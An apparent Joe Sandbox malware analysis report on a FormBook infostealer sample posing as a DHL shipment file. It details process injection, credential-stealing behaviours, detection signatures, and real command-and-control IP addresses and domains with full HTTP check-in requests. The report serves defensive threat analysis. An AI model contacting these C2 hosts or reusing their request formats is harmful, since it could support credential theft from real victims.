Edit tour

Windows Analysis Report
DHL 8350232025-1.exe

Overview

General Information

Sample name:	DHL 8350232025-1.exe
Analysis ID:	1584795
MD5:	ac2d6baf219be307bce9bc93f3bd4f3a
SHA1:	058503c707b7025b3e18a093efdccb9fdf2c4c4f
SHA256:	092994c6de1265b32d1aa1bfb6192e4d15f5877a5f6f48833152dc2b4b3dd5c5
Tags:	exeuser-TeamDreier
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

DHL 8350232025-1.exe (PID: 4424 cmdline: "C:\Users\user\Desktop\DHL 8350232025-1.exe" MD5: AC2D6BAF219BE307BCE9BC93F3BD4F3A)

svchost.exe (PID: 5776 cmdline: "C:\Users\user\Desktop\DHL 8350232025-1.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

EBeVwyXzNOzYtNUOvQ.exe (PID: 5648 cmdline: "C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 5420 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)

EBeVwyXzNOzYtNUOvQ.exe (PID: 2948 cmdline: "C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 5040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1603244254.00000000039A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1603244254.00000000039A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1602875131.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1602875131.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3911918141.0000000002A10000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3911918141.0000000002A10000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3911851240.00000000029D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3911851240.00000000029D0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3912815274.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3912815274.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x32d27:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1c3c6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3911205481.0000000002540000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3911205481.0000000002540000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3913125280.0000000003930000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3913125280.0000000003930000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x58cb52:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x5761f1:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1603846047.0000000004C00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1603846047.0000000004C00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x58cb52:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x5761f1:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL 8350232025-1.exe", CommandLine: "C:\Users\user\Desktop\DHL 8350232025-1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 8350232025-1.exe", ParentImage: C:\Users\user\Desktop\DHL 8350232025-1.exe, ParentProcessId: 4424, ParentProcessName: DHL 8350232025-1.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 8350232025-1.exe", ProcessId: 5776, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\DHL 8350232025-1.exe", CommandLine: "C:\Users\user\Desktop\DHL 8350232025-1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 8350232025-1.exe", ParentImage: C:\Users\user\Desktop\DHL 8350232025-1.exe, ParentProcessId: 4424, ParentProcessName: DHL 8350232025-1.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 8350232025-1.exe", ProcessId: 5776, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-06T14:32:46.582561+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49707	154.215.72.110	80	TCP
2025-01-06T14:33:18.609515+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49712	116.50.37.244	80	TCP
2025-01-06T14:34:40.132159+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49769	85.159.66.93	80	TCP
2025-01-06T14:34:53.680378+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49987	91.195.240.94	80	TCP
2025-01-06T14:35:15.158106+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49991	66.29.149.46	80	TCP
2025-01-06T14:35:28.573323+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49995	195.110.124.133	80	TCP
2025-01-06T14:35:58.216808+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.8	49999	217.196.55.202	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DHL 8350232025-1.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.elettrosistemista.zip/fo8o/?XHI=wJbPZ8pHe&bp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ==	Avira URL Cloud: Label: malware
Source: http://www.rssnewscast.com/fo8o/?bp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&XHI=wJbPZ8pHe	Avira URL Cloud: Label: malware
Source: http://www.goldenjade-travel.com/fo8o/?XHI=wJbPZ8pHe&bp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ==	Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: DHL 8350232025-1.exe	Virustotal: Detection: 29%			Perma Link
Source: DHL 8350232025-1.exe	ReversingLabs: Detection: 31%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1603244254.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1602875131.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3911918141.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3911851240.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3912815274.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3911205481.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3913125280.0000000003930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1603846047.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: DHL 8350232025-1.exe

Joe Sandbox ML: detected

Source: DHL 8350232025-1.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EBeVwyXzNOzYtNUOvQ.exe, 00000003.00000000.1524678482.000000000032E000.00000002.00000001.01000000.00000004.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000002.3911204797.000000000032E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL 8350232025-1.exe, 00000000.00000003.1450362900.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, DHL 8350232025-1.exe, 00000000.00000003.1448312981.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1603289868.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508657535.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1603289868.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1510396331.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1606858103.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3913704213.0000000003060000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3913704213.00000000031FE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1603263142.0000000002D0A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL 8350232025-1.exe, 00000000.00000003.1450362900.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, DHL 8350232025-1.exe, 00000000.00000003.1448312981.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1603289868.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508657535.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1603289868.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1510396331.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.1606858103.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3913704213.0000000003060000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3913704213.00000000031FE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1603263142.0000000002D0A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1572046681.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1603041914.0000000003400000.00000004.00000020.00020000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000003.00000003.1544188752.000000000131B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3911989636.0000000002A9E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3914997202.000000000368C000.00000004.10000000.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000000.1673844069.000000000347C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1895418867.000000002C87C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3911989636.0000000002A9E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3914997202.000000000368C000.00000004.10000000.00040000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000006.00000000.1673844069.000000000347C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1895418867.000000002C87C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1572046681.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1603041914.0000000003400000.00000004.00000020.00020000.00000000.sdmp, EBeVwyXzNOzYtNUOvQ.exe, 00000003.00000003.1544188752.000000000131B000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_001DC2A2 FindFirstFileExW,	0_2_001DC2A2
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_002168EE FindFirstFileW,FindClose,	0_2_002168EE
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_0021698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0021698F
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_0020D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0020D076
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_0020D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0020D3A9
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_00219642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00219642
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_0021979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0021979D
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_00219B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00219B2B
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_0020DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0020DBBE
Source: C:\Users\user\Desktop\DHL 8350232025-1.exe	Code function: 0_2_00215C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00215C97
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0255BAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_0255BAB0

Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then xor eax, eax	4_2_02549480
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then pop edi	4_2_0254DD45
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_02DA053E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49707 -> 154.215.72.110:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49712 -> 116.50.37.244:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49769 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49991 -> 66.29.149.46:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49987 -> 91.195.240.94:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49999 -> 217.196.55.202:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49995 -> 195.110.124.133:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.joyesi.xyz

Source: Joe Sandbox View	IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View	IP Address: 154.215.72.110 154.215.72.110
Source: Joe Sandbox View	IP Address: 195.110.124.133 195.110.124.133

Source: Joe Sandbox View	ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View	ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\DHL 8350232025-1.exe

Code function: 0_2_0021CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0021CE44

Source: global traffic	HTTP traffic detected: GET /fo8o/?XHI=wJbPZ8pHe&bp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?XHI=wJbPZ8pHe&bp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?XHI=wJbPZ8pHe&bp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?bp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&XHI=wJbPZ8pHe HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?bp=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd68f41LHWk1tWVOcLO2B4JSrTHSWnbApQ5HDH0jFdh0bEA==&XHI=wJbPZ8pHe HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?XHI=wJbPZ8pHe&bp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
